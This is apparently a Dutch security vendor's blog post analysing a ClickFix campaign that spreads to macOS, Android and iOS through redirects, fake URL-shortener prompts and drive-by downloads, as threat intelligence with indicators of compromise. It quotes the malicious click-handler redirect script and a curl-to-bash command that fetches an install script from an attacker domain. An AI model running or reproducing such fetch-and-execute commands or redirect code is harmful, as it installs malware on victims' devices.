Skip to main content
Blog
Attacks Blog

Meedogenloze aanvallen aan de clientzijde gericht op meerdere platforms met ClickFix

In dit artikel bespreken we een recente ClickFix-variant die zich nu richt op macOS, Android en iOS, met behulp van browsergebaseerde omleidingen, valse UI-prompts en zelfs drive-by-downloadtechnieken.

May 28, 2025 Bijgewerkt Jul 20, 2026 5 min read
ClickFix-aanval coverafbeelding
Inhoudsopgave

Kort samengevat: ClickFix-keten via cutt.ly-shortener die macOS, Android en iOS raakt met drive-by tarball

  • Niet alleen Windows: ClickFix werd gearchiveerd als Windows PowerShell-prompts en vergeten. Dat mentale model is precies waarom dezelfde social-engineeringketen nu werkt op macOS-terminals, Android drive-by downloads en iOS-tarballs met wachtwoordbeveiliging.
  • De aanvalsketen: De keten begon met idjhvn4m[.]pro dat ongewoon schone JavaScript laadde, redirectte via kbmljxm[.]com en een legitieme cutt.ly-shortener, en dropte vervolgens een macOS shell-script vanaf vuwzer[.]com dat door 10 engines werd gedetecteerd, en een mobiele payload van iteslawow[.]com die door 5 engines op VirusTotal werd gedetecteerd. cside legt vast welk script elke gebruiker daadwerkelijk ontvangt en gebruikt LLM-geassisteerde detectie om OS-gerichte downloadflows te markeren.
  • Herzie de aanname: Als je endpointteam ClickFix afdeed als een Windows-probleem, herzie die aanname dan deze week. De aanvallers zijn cross-platform gegaan, en statische scanners krijgen nog steeds schone content voorgeschoteld omdat ze de redirect-keten die de bezoeker ziet, niet kunnen zien.

Weinig tijd? Bekijk cside's in-browser Magecart- en skimmerblokkering. Dit dekt alles hieronder in één deployment.

Wat begon als een op Windows gerichte social-engineeringtruc, is uitgegroeid tot een bedreiging op meerdere platforms aan de clientzijde. In dit artikel bespreken we een recente ClickFix-variant die zich nu richt op macOS, Android en iOS, met behulp van browsergebaseerde omleidingen, valse UI-prompts en drive-by-downloadtechnieken.

Wat is een ClickFix-aanval?

ClickFix-aanvallen zijn niet nieuw. Mijn eerste ontmoeting hiermee was in september 2024:

Tweet die een vroege ClickFix-aanval uit september 2024 documenteert
Tweet

Een ClickFix-aanval is een vorm van gerichte social engineering of client-side aanval waarbij misbruik wordt gemaakt van het instinct van een gebruiker om "het probleem gewoon op te lossen". Het begint meestal met een overtuigend bericht dat wijst op een vermeend probleem (zoals een beveiligingslek of een repositoryprobleem). De gebruiker wordt aangespoord om op een link te klikken of een commando uit te voeren, in de veronderstelling dat hij iets belangrijks oplost.

In dit aanvalsvoorbeeld wordt de gebruiker gevraagd een script in de terminal uit te voeren. Op Windows betekende dat PowerShell. Dezelfde techniek werkt ook op macOS en Linux. En net als bij Windows ging ik ervan uit dat gebruikers hier niet in zouden trappen.

Aannames zijn echter een gevaarlijk spel in cybersecurity, wat helaas opnieuw werd bewezen.

Wij zijn cside en we monitoren client-side aanvallen met scripts van derden en verbeteren realtime beveiliging aan de clientzijde voor websites en hun gebruikers. Alleen al in de afgelopen drie maanden hebben we meer dan 300.000 gecompromitteerde websites waargenomen.

Dit is de tweede keer dat we het nieuws brengen over aanvallers die hun TTP's (Tactics, Techniques, and Procedures) verder ontwikkelen.

Maar wat ooit een bedreiging was die alleen Windows trof, richt zich nu ook op andere besturingssystemen.

De aanval in detail

We ontvingen een waarschuwing voor JavaScript dat werd gedownload van:

hxxps://idjhvn4m[.]pro?h=7bd350a4ed55a8faf2e45301d70d2&user=16

Het geleverde script:

(function () { var sitename = document.querySelector("meta[property='og:url']").getAttribute("content"); const mysite = new URL(sitename);const mysitename = `${mysite.protocol}//${mysite.hostname}`;var mytitle = document.querySelector("meta[property='og:title']").getAttribute("content"); var xtitle_spe = mytitle.replace(/[&\/\\#, +()$~%.'":*?<>{}]/g, '-'); var xtitle_spa = xtitle_spe.replace(/\s+/g, '-'); var oldurl = 'https://kbmljxm.com/?s={KEYWORD}&p=16'; var final_url_1 = oldurl.replace('{KEYWORD}', xtitle_spa);var final_url_2 = final_url_1.replace('{site}', mysitename); var id = 16; var successResponse = final_url_2; var elements = document.getElementsByClassName("buttonPress-"+16); for(var i = 0; i < elements.length; i++) {var anchor = elements[i];anchor.onclick = function() {window.open(successResponse, '_blank');}} })();

Deze JavaScript is niet sterk versluierd, wat ongebruikelijk is voor dit soort aanvallen. Het creëert een klikhandler voor elementen met een specifieke klassenaam die bij een klik een URL in een nieuw tabblad opent. Dit is wat het doet:

  • Neemt een sjabloon-URL (hxxps://kbmljxm[.]com/?s={KEYWORD}&p=16)
  • Vervangt {KEYWORD} door de verwerkte paginatitel
  • Koppelt klikhandlers aan alle elementen met de klasse buttonPress-16
  • Wanneer erop wordt geklikt, openen deze elementen de samengestelde URL in een nieuw tabblad

Hieronder staat de omleidingsketen:

Netwerktabblad van de browser met het verzoek uit de omleidingsketen
Tabblad Netwerk met verzoek
JavaScript-code die de kwaadaardige omleidings-URL en klikhandlers opbouwt
JavaScript-code

Omleidingsketen op de gebruikersinterface

De pagina ziet eruit als een URL-verkorter en vraagt de gebruiker een link te kopiëren. De aanvallers maken misbruik van cutt[.]ly, een legitieme URL-verkorter.

Wanneer een gebruiker de verkorte URL in de browser plakt, wordt hij of zij doorgestuurd naar:

Nagebootste URL-verkorterpagina die cutt.ly misbruikt, getoond aan de gebruiker in de omleidingsketen

Deze nagebootste URL-verkorterpagina laat de volgende pop-up zien:

"Plak de link die je hebt gekopieerd in de adresregel van de browser."

Pop-up die de gebruiker vraagt de gekopieerde link in de adresbalk van de browser te plakken
"Plak de link die je hebt gekopieerd in de adresregel van de browser."

Vervolgens wordt de gebruiker doorgestuurd naar een downloadpagina (in dit geval voor macOS):

Nep macOS-downloadpagina waarnaar de gebruiker wordt omgeleid
Vervolgens wordt de gebruiker doorgestuurd naar een downloadpagina (in dit geval voor macOS):
/bin/bash -c "$(curl -fsSL hxxps://vuwzer[.]com/get/install.sh)"

De inhoud van dit shellbestand is als volgt te zien in deze screenshot:

Inhoud van het kwaadaardige shellscript install.sh

Dit shellscript downloadt vervolgens een macOS-uitvoerbaar bestand (gedetecteerd door 10 antivirus-engines op VirusTotal).

VirusTotal-resultaat waarop het macOS-uitvoerbare bestand door 10 antivirus-engines wordt gemarkeerd

Gedrag op Android en iOS

Toen we dit op Android en iOS testten, verwachtten we een ClickFix-variant. In plaats daarvan kwamen we een drive-by-aanval tegen.

Een drive-by-aanval is een type cyberaanval waarbij kwaadaardige code wordt uitgevoerd of naar een apparaat gedownload simpelweg door een gecompromitteerde of kwaadaardige webpagina te bezoeken. Er is geen klik, installatie of interactie nodig.

De pagina stuurde ons nu door naar:

hxxps://iteslawow[.]com/?=ijn&diu=16&sid=npT
Pagina 'Bestand is klaar om te downloaden' in de mobiele browser tijdens de drive-by-aanval
Pagina "Bestand is klaar om te downloaden" op mobiele browser

Deze site downloadde een .tar-bestand - beveiligd met een 7zip-wachtwoord - dat de malware uitpakte en plaatste (gedetecteerd door 5 AV-engines). Het werd ook gedetecteerd door 5 leveranciers op VirusTotal.

Het werd gedetecteerd door 5 leveranciers op VirusTotal.

VirusTotal-resultaat waarop de mobiele malware door 5 leveranciers wordt gedetecteerd
VirusTotal-score van 5

Zowel op Android als op Windows werd deze drive-by-aanvalsstijl gebruikt.

Deze aanval laat zien hoe ver aanvallers hun bereik uitbreiden. Wat begon als een Windows-specifieke ClickFix-campagne richt zich nu op macOS, Android en iOS, wat de schaal van de operatie aanzienlijk vergroot.

Het is opnieuw een herinnering aan hoe wijdverspreid client-side aanvallen zijn geworden, en de vele vormen die ze kunnen aannemen, allemaal door misbruik te maken van het vertrouwen dat gebruikers stellen in browserinteracties wanneer beveiliging aan de clientzijde ontbreekt of slecht wordt afgedwongen.

Himanshu Anand
Software Engineer

I'm a software engineer and security analyst.

FAQ

Frequently Asked Questions

Een ClickFix-aanval is een social engineering-techniek die het instinct van een gebruiker misbruikt om "het probleem gewoon op te lossen". De aanvaller toont een nepfout of -waarschuwing (beveiligingsmelding, repositoryprobleem, systeembericht) en instrueert de gebruiker om een terminalcommando uit te voeren, code in een browserconsole te plakken of op een kwaadaardige link te klikken. De gebruiker denkt een probleem op te lossen, maar voert in werkelijkheid de payload van de aanvaller uit.

Ja. ClickFix begon op Windows met PowerShell-prompts, maar cside heeft actieve campagnes waargenomen die zich richten op macOS (downloaden van shell-scripts die macOS-uitvoerbare bestanden ophalen), Android en iOS (drive-by downloads met wachtwoordbeveiligde .tar-bestanden). De cross-platform variant leunt op browsergebaseerde omleidingen en valse UI-prompts in plaats van OS-specifieke tooling.

De campagne die in dit artikel wordt geanalyseerd gebruikte `idjhvn4m[.]pro` als initiële JavaScript-leveringshost, `kbmljxm[.]com` als omleidings-tussenpersoon en `iteslawow[.]com` voor de drive-by payload op Android en iOS. De payloads in de eindfase werden gemarkeerd door 5-10 antivirus-engines op VirusTotal. Verdedigers moeten deze domeinen als IOC's behandelen en hun egress-logs controleren op overeenkomsten.

Runtime-monitoring aan de clientzijde is vereist. Het kwaadaardige gedrag vindt plaats nadat de pagina is geladen, vaak alleen voor een deel van de bezoekers op basis van geografie, apparaat of referrer. Statische scanners missen deze payloads omdat aanvallers de scanners detecteren en hen schone content serveren. cside legt het werkelijke script vast dat elke gebruiker ontvangt en gebruikt LLM-geassisteerde detectie om omleidingen, valse prompts en OS-gerichte downloadstromen te markeren.

Het is een directe evolutie. De ontmoeting van september 2024 waarnaar in het artikel wordt verwezen, documenteerde de eerste variant op Windows. De hier beschreven campagne hergebruikt hetzelfde social-engineeringpatroon, maar breidt de lijst met doelbesturingssystemen uit en schakelt over van een uitvoeringsstroom die alleen op Windows draaide naar een multi-OS-leveringsmechanisme met nieuwe infrastructuur.

Monitor en beveilig je third-party scripts

Gain full visibility and control over every script delivered to your users to enhance site security and performance.

Start gratis, of probeer Business met een proefperiode van 14 dagen.

cside-dashboardinterface met scriptmonitoring en beveiligingsanalyses
Related Articles
Boek een demo

Wil je dit doornemen met een engineer?

Dertig minuten, op je eigen site. Geen slides.

Boek een persoonlijke demo om te zien:

Hoe je in 1 dag voldoet aan PCI DSS-vereisten 6.4.3 en 11.6.1
Waarom scripts van derden een beveiligingsrisico zijn voor jou en je bezoekers
Hoe je privacy- en toestemmingslekken (AVG, CCPA) bij elke derde partij monitort
Hoe je misbruik van aanmeldingen, account sharing en chargeback-fraude stopt met device intelligence
Hoe je AI-agents en bots die je site bereiken in realtime detecteert en beheerst

Liever gewoon een vraag stellen?

Vrije momenten zoeken…

Alleen echte mensen. Wij merken het.

Lukt het boeken niet? Agenda in een nieuw tabblad openen

Wat wil je oplossen?

Vertel het ons in één zin, dan komen we terug met iets bruikbaars in plaats van een standaardverhaal.

Waar we meestal mee helpen:

Zien welke scripts van derden op je site draaien
Bewijs voor PCI DSS 6.4.3 en 11.6.1
Bots, AI-agents en accountovername

Liever meteen een moment inplannen? Kies een tijdstip